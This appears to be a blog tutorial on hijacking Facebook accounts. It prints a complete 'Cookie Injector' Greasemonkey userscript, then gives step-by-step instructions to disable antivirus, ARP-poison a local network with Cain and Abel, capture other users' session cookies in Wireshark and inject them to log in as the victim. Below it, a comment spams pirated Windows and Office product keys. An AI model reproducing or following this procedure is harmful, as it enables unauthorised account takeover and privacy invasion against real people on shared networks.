Hacking Facebook by stealing Cookies

Prerequisites:
           
5. Cookie Injector
6. A brain
7. Logic

Save the following script as "user.js"

Code:

// ==UserScript==
// @name           Cookie Injector
// @namespace      BearsWithWings
// @description    Inject Cookie String From Wireshark Dump Into Any Webpage
// @version 2.0
// @include        *
// @exclude       https?://gmail.com/*
// @exclude       https?://mail.google.com/*
// ==/UserScript==

//Anonomyous function wrapper
(function (){
    //Ensure that there is only one instance of the cookieInjector Object
    if(typeof this["cookieInjector"] == "undefined"){    
        cookieInjector = {};
    }    

    //Make a local refrence to the cookie Injector object to save on typing
    var cI = cookieInjector;
    //Make the cookieInjector object globally viewable
    unsafeWindow['cookieInjector'] = cI;
    
    /**
    * Cookie Injector createDiv function
    * Sets up the cookie injector dialogue
    */
    cI.createDiv = function(){
        //Create the DIV to contain the Dialog
        cI.dialog = document.createElement('div');
        cI.dialog.id = "cookieInjectorDiv";
        cI.dialog.innerHTML = "<div align='center'>Wireshark Cookie Dump:<br/><input type='text' id='cookieInjectorCookie'/><br/><button onclick='cookieInjector.writeCookie();'>OK</button><button onclick='cookieInjector.hide();'>Cancel</button></div>";
        cI.dialog.style.display = "none";
        cI.dialog.style.position = "fixed";
        cI.dialog.style.opacity = "0.9";
        cI.dialog.style.top = "40%";
        cI.dialog.style.background= "#DDDDDD";
        cI.dialog.style.left = "40%";
        cI.dialog.style.width = "20%";
        cI.dialog.style.zindex = "99999";
        document.body.appendChild(cI.dialog);
        cI.visible = false;
    } 

    /**
    * Show the dialog
    */
    cI.show = function(){
        if(!cI.dialog) {
            cI.createDiv();
        }
        cI.dialog.style.display = "block";
        cI.visible = true;
    }

    /**
    * Hide the dialog
    */
    cI.hide = function(){
        cI.dialog.style.display = "none";
        cI.visible = false;
    }

    /**
    * Gets the wireshark dump string and converts it into cookies
    */
    cI.writeCookie = function(){
        //Grab a handle to the text field which contains the string
        var cookieNode = document.getElementById('cookieInjectorCookie');
        var cookieText = cI.cleanCookie(cookieNode.value);
        cookieNode.value = "";
        
        //We have to add the cookies one at a time, so split around the colin
        var cookieArray = cookieText.split(";");
        for(var x=0; x<cookieArray.length; x++){
            //We want the path to be the root, the host is filled in automatically 
            //since we are on the same webpage that we captured the cookies on
            document.cookie = cookieArray[x]+"; path=/";
        }        

        alert("All Cookies Have Been Written");
        cI.hide();
    }

    /**
    * Do a little big of cleanup on the cookie string, Mostly we are looking
    * To get rid of the "Cookie: " string that Wireshark prepends to the cookie string
    */
    cI.cleanCookie = function(cookieText){
        var cookie = cookieText.replace("Cookie: ","");
        return cookie;
    }    
    
    /**
    * Handle all keypresses, we are looking for an ALT-C key-combo. Since we can't detect
    * Two keys being pressed at the same time, we first make sure the ALT key was pressed
    * then we wait to see if the C key is pressed next
    */
    cI.keyPress = function (e){    
        //Check to see if "C" is pressed after ALT    
        if(e.keyCode == 67 && cI.ctrlFire){
            if(!cI.visible){        
                cI.show();
            }else{
                cI.hide();
            }
        }

        //Make sure the Alt key was previously depressed
        if(e.keyCode == 18){
            cI.ctrlFire = true;
        }else{
            cI.ctrlFire = false;
        }
    }

    //Capture all onkeydown events, so we can filter for our key-combo
    cI.visible = false;
    window.addEventListener('keydown', cI.keyPress,'false');
})();

Procedure:

1. Download and install Firefox.


2. Download and install Grease monkey as an Ad-On to your Browser (Firefox).
            a. Go to link and download 
            b. Click on Add to "Firefox" As shown in the below figure.


            c. Wait for the Pop up and wait 5 second then press "Install".


           d. Once installed correctly you should see a monkey face on top right of your firefox browser.
           e.  Make sure that the Grease monkey is enabled.

3. Download and install Cookie Injector 2.0 with Grease monkey.
           a. Find it on google (Cookie Injector 2.0)
           b. Download and Install Cookie Injector 2.0 with Grease monkey.


           c. Make sure that Cookie Injector 2.0 is enabled.

4. Download and Install Cain and Abel.

5. Download and Install Wireshark.

After these steps you should have the icons for Cookie injector, Cain and Wireshark installed on your desktop.


6. Now Open Firefox and open a Facebook page.

While on the page press on "Alt + C", you will see Wireshark cookie dump that will appear on your Facebook page like the following image.


7. Now you will open Cain and Abel.
            a. Make sure you disable any AV or Firewall.
            b. Configure your Cain and Abel correctly.
            c. Go to Sniffer and at the bottom you can see "Host", click it.

       It should look like this:


            d. 4. At the bottom click on "APR"
            e. Click on "Add to list" the blue (+)


            f. Choose your PC IP and Modem/Rooter IP.
            g. Click on Start/Stop APR and let it run.

8. Now Open Wireshark.

            a. Click on Capture Options.
            b. Choose your Network Internet.
            c. Click on Start.


9. Now you should see a bunch of IPs coming with info.


Search for http.cookie/cookie/http

Right click on it, copy>Bytes>Printable text only.

Then go back to your Facebook page, Copy and paste it to the Wireshark Cookie Dump and press "Ok".

Now when you reload the page you should have logged in.


2 comments:

  1. sql server 2008 r2 key enterprise , windows 10 activation windows 7 , windows anytime upgrade from starter to home basic key free , buy windows 10 enterprise key , windows 10 activation 64 bit , windows 7 pro key license key , free win7 product key , free buy windows 7 key online , tkw2Pb

    office 2016 product serial free

    windows 10 enterprise key

    office 2016 product key

    Windows 10 product key code sale

    office 2016 product key sale

    ReplyDelete

Related Posts Plugin for WordPress, Blogger...